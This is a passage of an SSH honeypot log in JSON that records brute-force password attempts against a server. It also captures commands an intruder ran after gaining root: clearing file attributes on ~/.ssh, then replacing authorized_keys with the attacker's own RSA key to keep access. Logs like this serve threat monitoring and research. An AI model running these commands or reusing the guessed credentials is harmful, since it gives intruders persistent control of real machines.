openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:49:46.251073Z","src_ip":"212.227.235.229","session":"a12d8eab0cb5"}
{"eventid":"cowrie.login.failed","username":"vncuser","password":"admin123","message":"login attempt [vncuser/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:49:46.657995Z","src_ip":"212.227.235.229","session":"a12d8eab0cb5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:49:47.761115Z","src_ip":"212.227.235.229","session":"a12d8eab0cb5"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":55814,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd36f45b6d95","protocol":"ssh","message":"New connection: 134.199.174.250:55814 (1.2.3.4:22) [session: cd36f45b6d95]","sensor":"my-vps","timestamp":"2025-09-08T13:49:59.018887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:49:59.019537Z","src_ip":"134.199.174.250","session":"cd36f45b6d95"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:49:59.380100Z","src_ip":"134.199.174.250","session":"cd36f45b6d95"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"admin123","message":"login attempt [www-data/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:50:00.638486Z","src_ip":"134.199.174.250","session":"cd36f45b6d95"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:50:01.956184Z","src_ip":"134.199.174.250","session":"cd36f45b6d95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39814,"dst_ip":"1.2.3.4","dst_port":22,"session":"31204b53ce7f","protocol":"ssh","message":"New connection: 212.227.235.229:39814 (1.2.3.4:22) [session: 31204b53ce7f]","sensor":"my-vps","timestamp":"2025-09-08T13:50:07.142130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:50:07.142900Z","src_ip":"212.227.235.229","session":"31204b53ce7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:50:07.260211Z","src_ip":"212.227.235.229","session":"31204b53ce7f"}
{"eventid":"cowrie.login.failed","username":"scpuser","password":"scpuser","message":"login attempt [scpuser/scpuser] failed","sensor":"my-vps","timestamp":"2025-09-08T13:50:07.770444Z","src_ip":"212.227.235.229","session":"31204b53ce7f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:50:08.890121Z","src_ip":"212.227.235.229","session":"31204b53ce7f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":56702,"dst_ip":"1.2.3.4","dst_port":22,"session":"98bcd82f53e5","protocol":"ssh","message":"New connection: 134.199.174.250:56702 (1.2.3.4:22) [session: 98bcd82f53e5]","sensor":"my-vps","timestamp":"2025-09-08T13:50:29.706014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:50:29.706636Z","src_ip":"134.199.174.250","session":"98bcd82f53e5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:50:30.071072Z","src_ip":"134.199.174.250","session":"98bcd82f53e5"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"1234","message":"login attempt [www-data/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:50:30.952463Z","src_ip":"134.199.174.250","session":"98bcd82f53e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58140,"dst_ip":"1.2.3.4","dst_port":22,"session":"6abebbefc847","protocol":"ssh","message":"New connection: 212.227.235.229:58140 (1.2.3.4:22) [session: 6abebbefc847]","sensor":"my-vps","timestamp":"2025-09-08T13:50:31.615560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:50:31.618094Z","src_ip":"212.227.235.229","session":"6abebbefc847"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:50:31.846268Z","src_ip":"212.227.235.229","session":"6abebbefc847"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":33752,"dst_ip":"1.2.3.4","dst_port":22,"session":"999cfa598b19","protocol":"ssh","message":"New connection: 49.247.35.31:33752 (1.2.3.4:22) [session: 999cfa598b19]","sensor":"my-vps","timestamp":"2025-09-08T13:50:32.099470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:50:32.119777Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:50:32.385419Z","src_ip":"134.199.174.250","session":"98bcd82f53e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:50:32.414265Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T13:50:32.760801Z","src_ip":"212.227.235.229","session":"6abebbefc847"}
{"eventid":"cowrie.login.success","username":"root","password":"qaz987","message":"login attempt [root/qaz987] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:50:33.576446Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:50:33.989634Z","src_ip":"212.227.235.229","session":"6abebbefc847"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:50:34.232404Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:50:34.233099Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:50:34.234129Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:50:34.519969Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:50:35.138599Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:50:35.139376Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:50:35.442462Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:50:35.443547Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":26003,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8e7f5275262","protocol":"ssh","message":"New connection: 49.247.35.31:26003 (1.2.3.4:22) [session: f8e7f5275262]","sensor":"my-vps","timestamp":"2025-09-08T13:50:35.733998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:50:35.736168Z","src_ip":"49.247.35.31","session":"f8e7f5275262"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:50:36.039416Z","src_ip":"49.247.35.31","session":"f8e7f5275262"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:50:37.198969Z","src_ip":"49.247.35.31","session":"f8e7f5275262"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:50:38.495368Z","src_ip":"49.247.35.31","session":"f8e7f5275262"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":3923,"dst_ip":"1.2.3.4","dst_port":22,"session":"66bba402a122","protocol":"ssh","message":"New connection: 49.247.35.31:3923 (1.2.3.4:22) [session: 66bba402a122]","sensor":"my-vps","timestamp":"2025-09-08T13:50:38.778162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:50:38.784839Z","src_ip":"49.247.35.31","session":"66bba402a122"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:50:39.076656Z","src_ip":"49.247.35.31","session":"66bba402a122"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:50:40.259963Z","src_ip":"49.247.35.31","session":"66bba402a122"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:50:40.556889Z","src_ip":"49.247.35.31","session":"999cfa598b19"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:50:40.557877Z","src_ip":"49.247.35.31","session":"66bba402a122"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46842,"dst_ip":"1.2.3.4","dst_port":22,"session":"00b89a44f10f","protocol":"ssh","message":"New connection: 212.227.235.229:46842 (1.2.3.4:22) [session: 00b89a44f10f]","sensor":"my-vps","timestamp":"2025-09-08T13:50:56.248384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:50:56.249037Z","src_ip":"212.227.235.229","session":"00b89a44f10f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:50:56.355561Z","src_ip":"212.227.235.229","session":"00b89a44f10f"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T13:50:57.037975Z","src_ip":"212.227.235.229","session":"00b89a44f10f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:50:58.152115Z","src_ip":"212.227.235.229","session":"00b89a44f10f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":36206,"dst_ip":"1.2.3.4","dst_port":22,"session":"8193b9f966bd","protocol":"ssh","message":"New connection: 134.199.174.250:36206 (1.2.3.4:22) [session: 8193b9f966bd]","sensor":"my-vps","timestamp":"2025-09-08T13:51:00.760162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:51:00.761219Z","src_ip":"134.199.174.250","session":"8193b9f966bd"}
